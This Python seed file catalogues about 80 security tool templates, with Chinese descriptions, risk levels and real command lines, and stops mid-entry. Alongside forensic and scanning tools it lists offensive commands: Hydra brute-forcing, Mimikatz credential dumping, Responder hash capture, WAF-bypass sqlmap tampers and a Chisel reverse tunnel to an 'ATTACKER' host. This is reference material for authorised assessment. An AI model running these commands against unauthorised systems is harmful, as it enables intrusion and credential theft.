# -*- coding: utf-8 -*-
"""
seed_data/tool_template_seeds.py — 检测工具配置模板种子数据（100+ 个）。

每个模板：工具名/类型/描述/常用命令/参数说明/输出格式/适用场景/依赖/风险等级。
命令示例均为真实可用的检测/评估命令，仅用于授权范围内的安全评估。
"""

from __future__ import annotations

TOOL_TYPES = ["扫描器", "漏洞利用", "密码破解", "取证分析", "逆向工程",
              "模糊测试", "协议分析", "代码审计", "容器扫描", "无线安全"]
RISK_LEVELS = ["低", "中", "高"]

# --------------------------------------------------------------------------- #
# 手工精编工具模板（真实命令）
# --------------------------------------------------------------------------- #
_CURATED: list[dict] = [
    {
        "name": "Nmap", "type": "扫描器", "risk": "中",
        "description": "网络发现与端口/服务/脚本扫描器，用于资产探测与服务识别。",
        "scenario": "授权目标的端口与服务识别",
        "dependencies": "nmap",
        "output_format": "人类可读/Nmap XML/grepable",
        "commands": [
            "nmap -sV -sC -p- target.com",
            "nmap -sV --script=vuln target.com",
            "nmap -sn 192.168.1.0/24",
            "nmap -A -T4 target.com",
            "nmap -p 80,443,8080 --open target.com",
        ],
        "params": "-sV 版本探测；-sC 等价 --script=default；-p- 全端口；-T4 时序；-oX 输出XML",
    },
    {
        "name": "Masscan", "type": "扫描器", "risk": "中",
        "description": "高速 TCP 端口扫描，适合大范围资产发现。",
        "scenario": "大规模互联网/内网资产端口发现",
        "dependencies": "masscan",
        "output_format": "列表/JSON/XML",
        "commands": [
            "masscan 10.0.0.0/8 -p80,443 --rate=10000",
            "masscan 192.168.1.0/24 -p0-65535",
            "masscan -iL targets.txt -p80,443,8080 --output-format json",
        ],
        "params": "--rate 发包速率；-iL 目标文件；--output-format 输出格式",
    },
    {
        "name": "Nuclei", "type": "扫描器", "risk": "中",
        "description": "基于 YAML 模板的漏洞与暴露面扫描器。",
        "scenario": "已知漏洞与默认凭据快速批量检测",
        "dependencies": "nuclei, nuclei-templates",
        "output_format": "JSONL/Markdown",
        "commands": [
            "nuclei -u https://target.com",
            "nuclei -l urls.txt -t cves/ -severity critical,high",
            "nuclei -u https://target.com -t exposed-panels/",
            "nuclei -u https://target.com -rl 50 -c 25",
        ],
        "params": "-t 模板目录；-severity 严重度过滤；-rl 速率限制；-c 并发",
    },
    {
        "name": "Nikto", "type": "扫描器", "risk": "低",
        "description": "Web 服务器扫描，检查危险文件、过期软件、配置问题。",
        "scenario": "Web 服务器基线检查",
        "dependencies": "nikto",
        "output_format": "文本/HTML/CSV",
        "commands": [
            "nikto -h https://target.com",
            "nikto -h 192.168.1.10 -p 8080",
            "nikto -h target.com -o report.html -Format html",
        ],
        "params": "-h 目标；-p 端口；-o 输出文件；-Format 输出格式",
    },
    {
        "name": "Gobuster", "type": "扫描器", "risk": "低",
        "description": "目录/子域/VHost 爆破工具。",
        "scenario": "Web 内容发现",
        "dependencies": "gobuster",
        "output_format": "文本",
        "commands": [
            "gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt",
            "gobuster dns -d target.com -w subdomains.txt",
            "gobuster vhost -u https://target.com -w vhosts.txt",
            "gobuster dir -u https://target.com -w common.txt -x php,html,bak",
        ],
        "params": "dir/dns/vhost 模式；-w 字典；-x 扩展名；-t 线程",
    },
    {
        "name": "Dirb", "type": "扫描器", "risk": "低",
        "description": "经典 Web 目录扫描器。",
        "scenario": "轻量目录枚举",
        "dependencies": "dirb",
        "output_format": "文本",
        "commands": [
            "dirb https://target.com",
            "dirb https://target.com /usr/share/wordlists/common.txt",
        ],
        "params": "直接传 URL 与字典路径",
    },
    {
        "name": "WPScan", "type": "扫描器", "risk": "中",
        "description": "WordPress 专用漏洞与配置扫描器。",
        "scenario": "WordPress 站点安全评估",
        "dependencies": "wpscan, ruby",
        "output_format": "JSON/CLI",
        "commands": [
            "wpscan --url https://wp.target.com --enumerate u,p,t",
            "wpscan --url https://wp.target.com --api-token TOKEN",
            "wpscan --url https://wp.target.com --usernames admin --passwords rockyou.txt",
        ],
        "params": "--enumerate u 用户/p 插件/t 主题；--api-token WPScan VIP",
    },
    {
        "name": "OpenVAS / Greenbone", "type": "扫描器", "risk": "中",
        "description": "综合漏洞扫描管理平台，覆盖 CVE 知识库。",
        "scenario": "企业资产漏洞巡检",
        "dependencies": "openvas/greenbone",
        "output_format": "PDF/CSV/HTML",
        "commands": [
            "gvmd --scan-start --target=192.168.1.0/24",
            "gvm-cli socket --xml=\"<get_tasks/>\"",
        ],
        "params": "通过 Web/CLI 创建任务、目标与报告",
    },
    {
        "name": "Metasploit Framework", "type": "漏洞利用", "risk": "高",
        "description": "渗透测试框架，含漏洞利用/辅助/后渗透模块（仅授权使用）。",
        "scenario": "授权渗透测试与漏洞验证",
        "dependencies": "metasploit-framework",
        "output_format": "控制台/报告",
        "commands": [
            "msfconsole -q",
            "use auxiliary/scanner/portscan/tcp",
            "search type:exploit platform:windows ms17-010",
            "db_nmap -sV 192.168.1.10",
        ],
        "params": "必须在书面授权范围内使用，禁止未授权利用",
    },
    {
        "name": "SQLMap", "type": "漏洞利用", "risk": "高",
        "description": "SQL 注入检测与利用工具（仅授权）。",
        "scenario": "授权 Web 注入点验证",
        "dependencies": "sqlmap, python3",
        "output_format": "交互/CSV/HTML",
        "commands": [
            "sqlmap -u 'https://target.com/page?id=1' --batch --dbs",
            "sqlmap -r request.txt --level=2 --risk=1",
            "sqlmap -u 'https://target.com/?id=1' --current-user --banner",
        ],
        "params": "-r 从文件读请求；--level/--risk 深度；--batch 自动；仅授权",
    },
    {
        "name": "Burp Suite", "type": "漏洞利用", "risk": "高",
        "description": "Web 代理抓包与漏洞测试平台。",
        "scenario": "Web 应用手工测试",
        "dependencies": "burpsuite",
        "output_format": "项目/报告",
        "commands": [
            "burpsuite",
            "# 配置浏览器代理 127.0.0.1:8080 后使用 Repeater/Intruder",
            "# 主动扫描(Active Scan)目标 URL",
        ],
        "params": "代理/Repeater/Intruder/Scanner 模块",
    },
    {
        "name": "Hydra", "type": "密码破解", "risk": "高",
        "description": "多协议在线口令喷洒/爆破（仅授权）。",
        "scenario": "授权弱口令检测",
        "dependencies": "hydra",
        "output_format": "文本",
        "commands": [
            "hydra -L users.txt -P pass.txt ssh://192.168.1.10",
            "hydra -l admin -P rockyou.txt ftp://target.com",
            "hydra -L users.txt -P pass.txt http-post-form \"/login:user=^USER^&pass=^PASS^:F=invalid\"",
        ],
        "params": "-L/-l 用户；-P/-p 密码；协议类型；仅授权",
    },
    {
        "name": "John the Ripper", "type": "密码破解", "risk": "中",
        "description": "离线哈希破解工具。",
        "scenario": "取证与审计中的哈希强度评估",
        "dependencies": "john",
        "output_format": "文本",
        "commands": [
            "john --wordlist=rockyou.txt hashes.txt",
            "john --format=raw-md5 --show hashes.txt",
            "john --list=formats | head",
        ],
        "params": "--wordlist 字典；--format 指定格式；--show 显示结果",
    },
    {
        "name": "Hashcat", "type": "密码破解", "risk": "中",
        "description": "GPU 加速离线哈希破解。",
        "scenario": "大规模离线哈希强度评估",
        "dependencies": "hashcat",
        "output_format": "文本",
        "commands": [
            "hashcat -m 0 -a 0 hash.txt rockyou.txt",
            "hashcat -m 1000 -a 0 nt_hashes.txt rockyou.txt",
            "hashcat -m 16500 jwt.txt rockyou.txt",
            "hashcat -m 1800 -a 0 sha512crypt.txt rockyou.txt",
        ],
        "params": "-m 哈希类型；-a 攻击模式；GPU 加速",
    },
    {
        "name": "Aircrack-ng", "type": "无线安全", "risk": "高",
        "description": "WiFi 审计套件（仅授权/自有网络）。",
        "scenario": "自有无线网络安全评估",
        "dependencies": "aircrack-ng, 无线网卡(monitor)",
        "output_format": "文本",
        "commands": [
            "airmon-ng start wlan0",
            "airodump-ng wlan0mon",
            "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon",
            "aircrack-ng -w rockyou.txt cap-01.cap",
        ],
        "params": "仅在自有/授权网络上进行",
    },
    {
        "name": "Wireshark / tshark", "type": "协议分析", "risk": "低",
        "description": "网络协议分析器。",
        "scenario": "流量取证与协议排障",
        "dependencies": "wireshark/tshark",
        "output_format": "pcap/文本",
        "commands": [
            "tshark -i eth0 -f 'tcp port 80'",
            "tshark -r capture.pcap -Y http",
            "tshark -r capture.pcap -T fields -e ip.src -e http.request.uri",
            "wireshark capture.pcap",
        ],
        "params": "-f BPF 过滤；-Y 显示过滤；-r 读文件",
    },
    {
        "name": "tcpdump", "type": "协议分析", "risk": "低",
        "description": "命令行抓包工具。",
        "scenario": "现场抓包取证",
        "dependencies": "tcpdump",
        "output_format": "pcap",
        "commands": [
            "tcpdump -i eth0 -w capture.pcap",
            "tcpdump -nn -i eth0 port 53",
            "tcpdump -r capture.pcap -n",
        ],
        "params": "-w 写文件；-n 不解析DNS；-i 接口",
    },
    {
        "name": "Volatility 3", "type": "取证分析", "risk": "低",
        "description": "内存取证框架。",
        "scenario": "事件响应中的内存分析",
        "dependencies": "volatility3",
        "output_format": "文本",
        "commands": [
            "vol -f memory.dmp windows.pslist",
            "vol -f memory.dmp windows.cmdline",
            "vol -f memory.dmp windows.netscan",
            "vol -f memory.dmp windows.malfind",
        ],
        "params": "-f 内存镜像；插件名；先确认操作系统层",
    },
    {
        "name": "Autopsy", "type": "取证分析", "risk": "低",
        "description": "磁盘镜像取证 GUI 平台。",
        "scenario": "数字取证调查",
        "dependencies": "autopsy",
        "output_format": "案件报告",
        "commands": [
            "autopsy",
            "# 通过向导导入镜像，运行哈希最近/Picture/Recent 解析器",
        ],
        "params": "GUI 案件管理，支持多镜像并行分析",
    },
    {
        "name": "Binwalk", "type": "取证分析", "risk": "低",
        "description": "固件镜像分析与提取工具。",
        "scenario": "IoT/嵌入式固件分析",
        "dependencies": "binwalk",
        "output_format": "文件系统",
        "commands": [
            "binwalk firmware.bin",
            "binwalk -e firmware.bin",
            "binwalk -Me firmware.bin",
        ],
        "params": "-e 提取；-M 递归",
    },
    {
        "name": "Radare2", "type": "逆向工程", "risk": "中",
        "description": "命令行逆向工程框架。",
        "scenario": "二进制恶意代码分析",
        "dependencies": "radare2",
        "output_format": "交互/JSON",
        "commands": [
            "r2 -A ./malware.bin",
            "aaa; afl",
            "pdf @ main",
            "izz~http",
        ],
        "params": "aaa 分析；afl 列函数；pdf 反汇编",
    },
    {
        "name": "Ghidra", "type": "逆向工程", "risk": "中",
        "description": "NSA 开源逆向工程与反编译平台。",
        "scenario": "二进制反编译分析",
        "dependencies": "ghidra, JDK",
        "output_format": "工程/反编译C",
        "commands": [
            "ghidraRun",
            "# 导入二进制后自动分析(Auto Analyze)",
            "# 用 Decompiler 查看伪 C",
        ],
        "params": "GUI 工程，支持脚本(Java/Python)自动化",
    },
    {
        "name": "JADX", "type": "逆向工程", "risk": "中",
        "description": "Android Dex/Jar 反编译为 Java。",
        "scenario": "APK 静态分析",
        "dependencies": "jadx, JDK",
        "output_format": "Java 源码/GUI",
        "commands": [
            "jadx -d out_dir app.apk",
            "jadx-gui app.apk",
            "jadx --show-bad-code -d out app.apk",
        ],
        "params": "-d 输出目录；GUI 便于交叉引用",
    },
    {
        "name": "apktool", "type": "逆向工程", "risk": "中",
        "description": "APK 解包/重打包工具。",
        "scenario": "APK 资源与 smali 分析",
        "dependencies": "apktool",
        "output_format": "smali/资源",
        "commands": [
            "apktool d app.apk",
            "apktool b app_decoded",
            "apktool d -s app.apk",
        ],
        "params": "d 解包；b 重打包；-s 不反编译 dex",
    },
    {
        "name": "Frida", "type": "逆向工程", "risk": "高",
        "description": "动态插桩工具，hook 函数与内存。",
        "scenario": "授权 App 动态分析",
        "dependencies": "frida, frida-tools",
        "output_format": "控制台",
        "commands": [
            "frida-ps -U",
            "frida -U -f com.target.app -l hook.js",
            "frida-trace -U -i 'open*' com.target.app",
        ],
        "params": "仅在自有/授权样本上使用",
    },
    {
        "name": "Objection", "type": "逆向工程", "risk": "高",
        "description": "基于 Frida 的运行时探索工具。",
        "scenario": "移动 App 运行时安全评估",
        "dependencies": "objection, frida",
        "output_format": "控制台",
        "commands": [
            "objection -g com.target.app explore",
            "android hooking list classes",
            "ios sslpinning disable",
        ],
        "params": "仅授权样本",
    },
    {
        "name": "Semgrep", "type": "代码审计", "risk": "低",
        "description": "静态代码分析，支持多语言规则包。",
        "scenario": "CI 代码安全扫描",
        "dependencies": "semgrep",
        "output_format": "JSON/SARIF",
        "commands": [
            "semgrep --config auto src/",
            "semgrep --config=p/security-audit src/",
            "semgrep --config=p/owasp-top-ten --json -o out.json src/",
        ],
        "params": "--config 规则；--json 输出；CI 集成",
    },
    {
        "name": "Trivy", "type": "容器扫描", "risk": "低",
        "description": "容器镜像/文件系统/依赖漏洞扫描器。",
        "scenario": "容器与依赖漏洞扫描",
        "dependencies": "trivy",
        "output_format": "JSON/Table/SARIF",
        "commands": [
            "trivy image nginx:1.21",
            "trivy fs --severity HIGH,CRITICAL .",
            "trivy config ./Terraform/",
            "trivy image --exit-code 1 --severity CRITICAL myapp:latest",
        ],
        "params": "image/fs/config 模式；--severity 过滤；--exit-code 失败退出",
    },
    {
        "name": "kube-hunter", "type": "容器扫描", "risk": "中",
        "description": "Kubernetes 集群安全风险发现工具。",
        "scenario": "K8s 集群配置审计",
        "dependencies": "kube-hunter",
        "output_format": "JSON/文本",
        "commands": [
            "kube-hunter --remote 192.168.1.10",
            "kube-hunter --active --report json",
        ],
        "params": "--remote 目标；--active 主动探测；--report 输出格式",
    },
    {
        "name": "kube-bench", "type": "容器扫描", "risk": "低",
        "description": "CIS Kubernetes Benchmark 检查。",
        "scenario": "K8s 合规基线检查",
        "dependencies": "kube-bench",
        "output_format": "JSON/文本",
        "commands": [
            "kube-bench run --targets master",
            "kube-bench run --json",
        ],
        "params": "--targets 节点角色；--json 输出",
    },
    {
        "name": "ZAP (OWASP ZAP)", "type": "扫描器", "risk": "中",
        "description": "开源 Web 应用代理扫描器。",
        "scenario": "Web 应用主动/被动扫描",
        "dependencies": "zaproxy",
        "output_format": "HTML/JSON/MD",
        "commands": [
            "zap-baseline.py -t https://target.com",
            "zap-full-scan.py -t https://target.com -r report.html",
        ],
        "params": "baseline/full 扫描；-t 目标；-r 报告",
    },
    {
        "name": "Amass", "type": "扫描器", "risk": "低",
        "description": "攻击面映射与子域名枚举。",
        "scenario": "外部资产发现",
        "dependencies": "amass",
        "output_format": "JSON/文本",
        "commands": [
            "amass enum -d target.com",
            "amass enum -active -d target.com -o subs.txt",
            "amass intel -d target.com -whois",
        ],
        "params": "enum/intel 子命令；-d 域名；-active 主动",
    },
    {
        "name": "subfinder", "type": "扫描器", "risk": "低",
        "description": "被动子域名发现。",
        "scenario": "资产侦察",
        "dependencies": "subfinder",
        "output_format": "JSON/文本",
        "commands": [
            "subfinder -d target.com",
            "subfinder -d target.com -o subs.txt",
            "subfinder -dL domains.txt -json",
        ],
        "params": "-d 域名；-dL 域名列表；-json",
    },
    {
        "name": "ffuf", "type": "扫描器", "risk": "低",
        "description": "Web fuzz 工具（目录/参数/vhost）。",
        "scenario": "Web 模糊测试",
        "dependencies": "ffuf",
        "output_format": "JSON/文本",
        "commands": [
            "ffuf -u https://target.com/FUZZ -w wordlist.txt",
            "ffuf -u https://target.com/api?FUFFFUZZ=1 -w params.txt",
            "ffuf -H 'Host: FUZZ.target.com' -u https://target.com -w vhosts.txt",
        ],
        "params": "FUZZ 关键字；-w 字典；-H 头",
    },
    {
        "name": "wfuzz", "type": "扫描器", "risk": "低",
        "description": "通用 Web fuzz 工具。",
        "scenario": "参数与端点发现",
        "dependencies": "wfuzz",
        "output_format": "文本",
        "commands": [
            "wfuzz -c -w wordlist.txt https://target.com/FUZZ",
            "wfuzz -z range,1-100 --hc 404 https://target.com/page?id=FUZZ",
        ],
        "params": "-w 字典；-z payload；--hc 隐藏码",
    },
    {
        "name": "CrackMapExec / NetExec", "type": "扫描器", "risk": "高",
        "description": "内网 SMB/WinRM/LDAP 横向与枚举（授权）。",
        "scenario": "授权内网评估",
        "dependencies": "netexec",
        "output_format": "文本/CSV",
        "commands": [
            "nxc smb 192.168.1.0/24",
            "nxc smb 192.168.1.10 -u admin -p pass --shares",
            "nxc ldap dc.target.local -u user -p pass --bloodhound",
        ],
        "params": "仅授权内网",
    },
    {
        "name": "BloodHound", "type": "扫描器", "risk": "中",
        "description": "AD 关系图分析，可视化攻击路径。",
        "scenario": "授权域环境评估",
        "dependencies": "bloodhound, neo4j",
        "output_format": "图数据库/JSON",
        "commands": [
            "python3 bloodhound.py -d target.local -u user -p pass -c All",
            "# 导入 zip 到 Neo4j 后用 BloodHound GUI 查询",
        ],
        "params": "-c 收集方法；仅授权",
    },
    {
        "name": "Responder", "type": "协议分析", "risk": "高",
        "description": "LLMNR/NBT-NS 毒化与哈希捕获（授权）。",
        "scenario": "授权内网凭据收集",
        "dependencies": "responder",
        "output_format": "控制台",
        "commands": [
            "responder -I eth0 -wv",
            "# 捕获 NTLMv2 哈希后用 hashcat 离线破解",
        ],
        "params": "-I 接口；-w 攻击WPAD；仅授权",
    },
    {
        "name": "Empire / Starkiller", "type": "漏洞利用", "risk": "高",
        "description": "PowerShell/python 后渗透框架（仅授权）。",
        "scenario": "授权后渗透",
        "dependencies": "bastion/empire",
        "output_format": "控制台",
        "commands": [
            "powershell-empire server",
            "powershell-empire client",
        ],
        "params": "仅授权红队",
    },
    {
        "name": "Mimikatz", "type": "漏洞利用", "risk": "高",
        "description": "Windows 凭据提取（仅授权/取证）。",
        "scenario": "授权后渗透与取证",
        "dependencies": "mimikatz",
        "output_format": "控制台",
        "commands": [
            "sekurlsa::logonpasswords",
            "lsadump::sam",
        ],
        "params": "仅授权；现代系统需关闭 Wdigest/Credential Guard",
    },
    {
        "name": "Chisel", "type": "漏洞利用", "risk": "中",
        "description": "TCP/UDP 隧道与端口转发。",
        "scenario": "授权内网穿透",
        "dependencies": "chisel",
        "output_format": "网络隧道",
        "commands": [
            "./chisel server -p 8080 --reverse",
            "./chisel client ATTACKER:8080 R:socks",
        ],
        "params": "仅授权",
    },
    {
        "name": "sqlmap 自定义 tamper", "type": "漏洞利用", "risk": "高",
        "description": "绕过 WAF 的 sqlmap 脚本。",
        "scenario": "授权 WAF 绕过测试",
        "dependencies": "sqlmap",
        "output_format": "文本",
        "commands": [
            "sqlmap -r req.txt --tamper=space2comment,between --batch",
            "sqlmap -r req.txt --tamper=charunicodeencode --batch",
        ],
        "params": "--tamper 脚本；仅授权",
    },
    {
        "name": "wfuzz 目录爆破", "type": "扫描器", "risk": "低",
        "description": "目录与文件 fuzz。",
        "scenario": "内容发现",
        "dependencies": "wfuzz",
        "output_format": "文本",
        "commands": [
            "wfuzz -c -w common.txt --hc 404 https://target.com/FUZZ",
        ],
        "params": "见 wfuzz",
    },
    {
        "name": "Amass 主动枚举", "type": "扫描器", "risk": "低",
        "description": "主动子域名枚举。",
        "scenario": "攻击面发现",
        "dependencies": "amass",
        "output_format": "JSON",
        "commands": ["amass enum -active -d target.com -json -o out.json"],
        "params": "见 amass",
    },
    {
        "name": "certspotter", "type": "扫描器", "risk": "低",
        "description": "证书透明日志查询。",
        "scenario": "域名证书发现",
        "dependencies": "curl/jq",
        "output_format": "JSON",
        "commands": [
            "curl -s 'https://crt.sh/?q=%25.target.com&output=json' | jq '.[].name_value'",
        ],
        "params": "crt.sh 接口",
    },
    {
        "name": "theHarvester", "type": "扫描器", "risk": "低",
        "description": "邮箱/子域/主机 OSINT 收集。",
        "scenario": "被动 OSINT",
        "dependencies": "theHarvester",
        "output_format": "HTML/JSON",
        "commands": [
            "theHarvester -d target.com -b all",
            "theHarvester -d target.com -b google,crtsh",
        ],
        "params": "-b 数据源",
    },
    {
        "name": "OSINT Framework 收集", "type": "扫描器", "risk": "低",
        "description": "多源 OSINT 聚合侦察。",
        "scenario": "前期信息收集",
        "dependencies": "多个",
        "output_format": "笔记",
        "commands": [
            "# Google Dorks: site:target.com ext:php",
            "# Shodan: ssl:target.com",
            "# GitHub: org:target.com password",
        ],
        "params": "dork 语法",
    },
    {
        "name": "Shodan CLI", "type": "扫描器", "risk": "低",
        "description": "互联网设备搜索引擎。",
        "scenario": "暴露面发现",
        "dependencies": "shodan",
        "output_format": "JSON",
        "commands": [
            "shodan search 'product:nginx port:443'",
            "shodan host 1.2.3.4",
            "shodan stats 'ssl:\"target.com\"'",
        ],
        "params": "需 API key",
    },
    {
        "name": "Censys", "type": "扫描器", "risk": "低",
        "description": "互联网资产与证书搜索。",
        "scenario": "资产暴露面",
        "dependencies": "censys-cli",
        "output_format": "JSON",
        "commands": [
            "censys search 'services.tls.certificates.leaf_data.subject.common_name: target.com'",
        ],
        "params": "需 API key",
    },
    {
        "name": "gitleaks", "type": "代码审计", "risk": "低",
        "description": "Git 仓库密钥泄露扫描。",
        "scenario": "代码仓库秘密检测",
        "dependencies": "gitleaks",
        "output_format": "JSON",
        "commands": [
            "gitleaks detect --source . --report-path leaks.json",
            "gitleaks git --log-opts='--all' .",
        ],
        "params": "detect/git 模式；--report-path",
    },
    {
        "name": "trufflehog", "type": "代码审计", "risk": "低",
        "description": "多源秘密泄露扫描。",
        "scenario": "代码与云存储密钥扫描",
        "dependencies": "trufflehog",
        "output_format": "JSON",
        "commands": [
            "trufflehog filesystem . --json",
            "trufflehog github --org=target-org",
        ],
        "params": "filesystem/github/s3 源",
    },
    {
        "name": "Bandit", "type": "代码审计", "risk": "低",
        "description": "Python 代码安全静态分析。",
        "scenario": "Python 项目安全扫描",
        "dependencies": "bandit",
        "output_format": "JSON/HTML",
        "commands": [
            "bandit -r src/ -f json -o bandit.json",
            "bandit -r src/ -ll",
        ],
        "params": "-r 递归；-f 格式；-ll 只报高危",
    },
    {
        "name": "ESLint Security Plugin", "type": "代码审计", "risk": "低",
        "description": "Node/JS 安全 lint。",
        "scenario": "前端/Node 代码审计",
        "dependencies": "eslint, eslint-plugin-security",
        "output_format": "文本",
        "commands": [
            "npx eslint --plugin security src/",
        ],
        "params": "eslint 配置",
    },
    {
        "name": "TruffleHog S3", "type": "代码审计", "risk": "低",
        "description": "对象存储密钥扫描。",
        "scenario": "云存储泄露检测",
        "dependencies": "trufflehog",
        "output_format": "JSON",
        "commands": ["trufflehog s3 --bucket=target-bucket --json"],
        "params": "s3 源",
    },
    {
        "name": "OpenSCAP", "type": "扫描器", "risk": "低",
        "description": "操作系统合规基线检查。",
        "scenario": "服务器配置合规",
        "dependencies": "openscap-utils",
        "output_format": "ARF/HTML",
        "commands": [
            "oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_standard --report report.html /usr/share/xml/scap/ssg/content/ssg-rhel8-ds.xml",
        ],
        "params": "profile/数据源选择",
    },
    {
        "name": "Lynis", "type": "扫描器", "risk": "低",
        "description": "Linux 系统安全审计。",
        "scenario": "主机基线审计",
        "dependencies": "lynis",
        "output_format": "报告",
        "commands": [
            "lynis audit system",
            "lynis audit system --quick",
        ],
        "params": "audit system；查看 /var/log/lynis.log",
    },
    {
        "name": "ClamAV", "type": "扫描器", "risk": "低",
        "description": "开源杀毒引擎。",
        "scenario": "文件恶意软件扫描",
        "dependencies": "clamav",
        "output_format": "文本",
        "commands": [
            "clamscan -r /home/user/",
            "clamscan -r --infected /tmp",
        ],
        "params": "-r 递归；--infected 只报感染",
    },
    {
        "name": "YARA", "type": "逆向工程", "risk": "低",
        "description": "恶意软件规则匹配。",
        "scenario": "威胁狩猎",
        "dependencies": "yara",
        "output_format": "文本",
        "commands": [
            "yara malware_rules.yar /path/to/samples",
            "yara -r rules.yar .",
        ],
        "params": "规则文件；-r 递归",
    },
    {
        "name": "Cuckoo Sandbox", "type": "取证分析", "risk": "中",
        "description": "自动化恶意软件动态分析沙箱。",
        "scenario": "样本动态行为分析",
        "dependencies": "cuckoo",
        "output_format": "JSON/报告",
        "commands": [
            "cuckoo submit ./sample.bin",
            "cuckoo report 1",
        ],
        "params": "在隔离环境运行",
    },
    {
        "name": "CAPA", "type": "逆向工程", "risk": "低",
        "description": "Mandiant 二进制能力识别。",
        "scenario": "恶意软件能力分类",
        "dependencies": "capa",
        "output_format": "JSON/文本",
        "commands": [
            "capa ./sample.exe",
            "capa --json ./sample.exe",
        ],
        "params": "识别恶意能力",
    },
    {
        "name": "FLARE VM / REMnux", "type": "逆向工程", "risk": "低",
        "description": "分析工程师专用工具环境。",
        "scenario": "搭建分析环境",
        "dependencies": "installer",
        "output_format": "环境",
        "commands": [
            "# FLARE VM (Windows 分析)",
            "# REMnux (Linux 恶意软件分析)",
        ],
        "params": "专用分析机",
    },
    {
        "name": "exiftool", "type": "取证分析", "risk": "低",
        "description": "文件元数据查看。",
        "scenario": "文件元数据取证",
        "dependencies": "exiftool",
        "output_format": "文本",
        "commands": [
            "exiftool image.jpg",
            "exiftool -all= image.jpg",
        ],
        "params": "查看/剥离元数据",
    },
    {
        "name": "foremost", "type": "取证分析", "risk": "低",
        "description": "文件 carving 工具。",
        "scenario": "磁盘镜像恢复",
        "dependencies": "foremost",
        "output_format": "文件",
        "commands": [
            "foremost -i disk.dd -o out -t pdf,jpg,docx",
        ],
        "params": "-t 文件类型",
    },
    {
        "name": "Wireshark 颜色与过滤", "type": "协议分析", "risk": "低",
        "description": "流量过滤技巧。",
        "scenario": "流量分析",
        "dependencies": "wireshark",
        "output_format": "pcap",
        "commands": [
            "http.request.method == POST",
            "tcp.flags.syn == 1 && tcp.flags.ack == 0",
            "dns.qry.name contains 'target'",
        ],
        "params": "显示过滤语法",
    },
    {
        "name": "Zeek / Bro", "type": "协议分析", "risk": "低",
        "description": "网络安全监控框架。",
        "scenario": "NSM 流量记录",
        "dependencies": "zeek",
        "output_format": "日志",
        "commands": [
            "zeek -r capture.pcap",
            "zeek -i eth0",
        ],
        "params": "conn.log/dns.log/http.log",
    },
    {
        "name": "Suricata", "type": "扫描器", "risk": "低",
        "description": "IDS/IPS 与 NSM 引擎。",
        "scenario": "入侵检测",
        "dependencies": "suricata",
        "output_format": "EVE JSON",
        "commands": [
            "suricata -r capture.pcap",
            "suricata -i eth0 -l /var/log/suricata",
        ],
        "params": "-r 离线；-i 在线；规则更新",
    },
    {
        "name": "tcpflow", "type": "协议分析", "risk": "低",
        "description": "TCP 流重组。",
        "scenario": "会话内容还原",
        "dependencies": "tcpflow",
        "output_format": "文件",
        "commands": ["tcpflow -r capture.pcap"],
        "params": "-r 读 pcap",
    },
    {
        "name": "hping3", "type": "扫描器", "risk": "中",
        "description": "手工 TCP/IP 数据包构造。",
        "scenario": "防火墙规则与连通性测试",
        "dependencies": "hping3",
        "output_format": "控制台",
        "commands": [
            "hping3 -S -p 80 target.com",
            "hping3 --scan 1-1000 -S target.com",
        ],
        "params": "-S SYN；--scan 端口",
    },
    {
        "name": "fping", "type": "扫描器", "risk": "低",
        "description": "批量 ping 存活探测。",
        "scenario": "主机存活发现",
        "dependencies": "fping",
        "output_format": "文本",
        "commands": [
            "fping -a -g 192.168.1.0/24",
            "fping -f targets.txt",
        ],
        "params": "-a 存活；-g 网段",
    },
    {
        "name": "arp-scan", "type": "扫描器", "risk": "低",
        "description": "二层 ARP 扫描。",
        "scenario": "内网主机发现",
        "dependencies": "arp-scan",
        "output_format": "文本",
        "commands": [
            "arp-scan --interface=eth0 192.168.1.0/24",
        ],
        "params": "二层发现",
    },
    {
        "name": "snmpwalk", "type": "扫描器", "risk": "低",
        "description": "SNMP 信息枚举。",
        "scenario": "网络设备信息收集",
        "dependencies": "net-snmp",
        "output_format": "文本",
        "commands": [
            "snmpwalk -v2c -c public 192.168.1.1 system",
            "snmpwalk -v3 -u user -l authPriv 192.168.1.1",
        ],
        "params": "-c community；-v 版本",
    },
    {
        "name": "dig/nslookup", "type": "扫描器", "risk": "低",
        "description": "DNS 查询。",
        "scenario": "DNS 记录检查",
        "dependencies": "bind-utils",
        "output_format": "文本",
        "commands": [
            "dig A target.com +short",
            "dig MX target.com",
            "dig TXT _dmarc.target.com",
        ],
        "params": "记录类型",
    },
    {
        "name": "openssl s_client", "type": "协议分析", "risk": "低",
        "description": "TLS 连接与证书检查。",
        "scenario": "TLS 配置验证",
        "dependencies": "openssl",
        "output_format": "文本",
        "commands": [
            "openssl s_client -connect target.com:443 -servername target.com",
            "openssl s_client -connect target.com:443 -tls1_2",
            "echo | openssl s_client -connect target.com:443 | openssl x509 -noout -dates",
        ],
        "params": "-connect；-servername SNI",
    },
    {
        "name": "testssl.sh", "type": "扫描器", "risk": "低",
        "description": "TLS/SSL 综合检测。",
        "scenario": "TLS 配置审计",
        "dependencies": "testssl.sh",
        "output_format": "文本/JSON",
        "commands": [
            "testssl.sh target.com:443",
            "testssl.sh --full target.com",
        ],
        "params": "--full 完整测试",
    },
    {
        "name": "sslscan", "type": "扫描器", "risk": "低",
        "description": "SSL 密码套件扫描。",
        "scenario": "TLS 套件审计",
        "dependencies": "sslscan",
        "output_format": "文本",
        "commands": ["sslscan target.com:443"],
        "params": "扫描支持的协议与套件",
    },
    {
        "name": "Dirb 大字典", "type": "扫描器", "risk": "低",
        "description": "大字典目录扫描。",
        "scenario": "深度内容发现",
        "dependencies": "dirb",
        "output_format": "文本",
        "commands": ["dirb https://target.com /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt"],
        "params": "大字典",
    },
    {
        "name": "feroxbuster", "type": "扫描器", "risk": "低",
        "description": "递归 Web 内容发现。",
        "scenario": "递归目录枚举",
        "dependencies": "feroxbuster",
        "output_format": "文本",
        "commands": [
            "feroxbuster -u https://target.com -w common.txt",
            "feroxbuster -u https://target.com -x php,bak",
        ],
        "params": "-x 扩展名；递归",
    },
    {
        "name": "gobuster vhost", "type": "扫描器", "risk": "低",
        "description": "虚拟主机枚举。",
        "scenario": "vhost 发现",
        "dependencies": "gobuster",
        "output_format": "文本",
        "commands": ["gobuster vhost -u https://target.com -w vhosts.txt"],
        "params": "vhost 模式",
